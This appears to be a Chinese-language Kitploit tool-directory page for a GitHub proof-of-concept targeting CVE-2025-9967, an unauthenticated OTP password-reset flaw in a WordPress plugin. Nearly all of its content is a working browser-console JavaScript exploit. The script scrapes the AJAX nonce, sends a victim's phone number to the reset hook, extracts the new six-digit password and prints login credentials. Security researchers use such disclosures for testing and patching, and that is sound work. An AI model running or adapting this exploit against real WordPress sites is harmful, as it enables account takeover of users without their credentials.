Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-9967 — 针对WordPress中未经验证的OTP密码重置漏洞的概念验证漏洞利用代码,使攻击者无需凭据即可重置受害者的密码。 | Kitploit
工具/GitHubGitHub/jfriedli/cve-2025-9967
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证
GitHubjfriedli/cve-2025-9967

CVE-2025-9967

针对WordPress中未经验证的OTP密码重置漏洞的概念验证漏洞利用代码,使攻击者无需凭据即可重置受害者的密码。

查看仓库
66个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

漏洞利用:未经身份验证的OTP密码重置

浏览器控制台PoC(无需认证)

(async () => {
  async function getNonceAndAjaxUrl() {
    if (window.reset_pass_obj) {
      return { nonce: reset_pass_obj.ajax_nonce, ajaxUrl: reset_pass_obj.ajax_url };
    }

    const home = await fetch('http://localhost/wordpress/').then(r => r.text());
    const m = home.match(/reset_pass_obj\s*=\s*\{[^}]*"ajax_nonce":"([^"]+)"[^}]*"ajax_url":"([^"]+)"/);

    if (!m) {
      throw new Error('Could not find reset_pass_obj; open a frontend page and try again.');
    }

    const nonce = m[1].replace(/\\u002D/g, '-');
    const ajaxUrl = m[2].replace(/\\\//g, '/');

    return { nonce, ajaxUrl };
  }

  const { nonce, ajaxUrl } = await getNonceAndAjaxUrl();

  // Target victim phone (must match stored user meta)
  const mob = '5551234'; // without country code
  const cc  = '1';       // country code (no '+')

  const form = new URLSearchParams();
  form.set('action', 'ihs_otp_reset_ajax_hook');
  form.set('security', nonce);
  form.set('data[mob]', mob);
  form.set('data[country_code]', cc);

  const res = await fetch(ajaxUrl, {
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: form
  });

  const text = await res.text();
  console.log('Raw response:', text);

  let j;
  try {
    j = JSON.parse(text);
  } catch {
    throw new Error('Server did not return valid JSON');
  }

  const msg  = j?.data?.msg || '';
  const pass = (msg.match(/\b\d{6}\b/) || [])[0];

  console.log({
    success: j?.success,
    api: j?.data?.api,
    full_msg: msg,
    new_password: pass
  });

  if (pass) {
    console.log('Login:', 'http://localhost/wordpress/wp-login.php');
    console.log('Username: victim');
    console.log('Password:', pass);
  } else {
    console.warn('Password not found in response');
  }
})();
下载工具